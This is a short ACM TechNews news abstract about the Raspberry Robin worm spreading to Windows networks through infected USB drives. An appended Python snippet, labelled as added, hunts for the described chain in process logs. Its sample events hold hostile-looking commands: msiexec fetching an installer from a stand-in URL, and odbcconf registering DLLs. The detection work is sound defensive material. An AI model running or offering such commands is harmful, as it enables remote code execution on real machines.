
Communications of the ACM

ACM TechNews

Hundreds of Windows Networks Infected with Raspberry Robin Worm


Microsoft flagged Raspberry Robin as a high-risk campaign with good reason, and for now there doesn't seem to be any mitigation process beyond not plugging suspicious USB devices into a Windows network.

Credit: Olemedia/Getty Images

A private threat intelligence advisory issued by Microsoft warns that hundreds of Windows networks are infected with the Raspberry Robin worm.

The worm is spread through infected USB devices. After the user inserts the USB device and clicks the malicious .LNK file, the worm launches an msiexec process and runs a malicious file located on the device.

A short URL is then used to establish a connection with a command and control server, potentially including QNAP NAS devices, which is followed by the download and installation of several malicious dynamic link libraries (DLLs).

The DLLs are executed using the legitimate Windows utility odbcconf.exe as the worm attempts to connect to Tor network nodes.

The actor behind Raspberry Robin has not yet taken advantage of any infected Windows networks, so the goal of the worm remains unknown.
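The chain described above (an msiexec process reaching out to a URL, followed by odbcconf.exe running a DLL) can be hunted for in process-creation logs. The sketch below is an added example, not part of the original article or of Microsoft's advisory; the event fields, host names, sample command lines and the two matching heuristics are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events (host, image path, command line).
# These are illustrative samples, not telemetry from a real incident.
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec /q /i http://short.example/a1"},
    {"host": "WS-01", "image": r"C:\Windows\System32\odbcconf.exe",
     "cmd": r"odbcconf /a {regsvr C:\Users\Public\x.dll}"},
    {"host": "WS-02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Installers\app.msi"},
    {"host": "WS-03", "image": r"C:\Windows\System32\odbcconf.exe",
     "cmd": r"odbcconf /a {regsvr C:\Temp\y.dll}"},
]

URL_RE = re.compile(r"https?://", re.I)   # msiexec given a remote source
DLL_RE = re.compile(r"\.dll\b", re.I)     # odbcconf pointed at a DLL


def classify(event):
    """Return the stage of the described chain an event matches, or None."""
    exe = event["image"].lower().rsplit("\\", 1)[-1]
    if exe == "msiexec.exe" and URL_RE.search(event["cmd"]):
        return "msiexec_remote_url"
    if exe == "odbcconf.exe" and DLL_RE.search(event["cmd"]):
        return "odbcconf_dll"
    return None


def triage(events):
    """Per host: both stages in order -> 'high'; a single stage -> 'review'."""
    stages = defaultdict(list)
    for ev in events:  # events are assumed to be in chronological order
        stage = classify(ev)
        if stage:
            stages[ev["host"]].append(stage)
    result = {}
    for host, seen in stages.items():
        chained = ("msiexec_remote_url" in seen and "odbcconf_dll" in seen
                   and seen.index("msiexec_remote_url") < seen.index("odbcconf_dll"))
        result[host] = "high" if chained else "review"
    return result


if __name__ == "__main__":
    for host, level in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, level)
```

A single matching stage is only a lead for review, since both utilities have legitimate administrative uses; the ordered pair on one host is the stronger signal.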

From PC Magazine


Abstracts Copyright © 2022 SmithBucklin, Washington, DC, USA

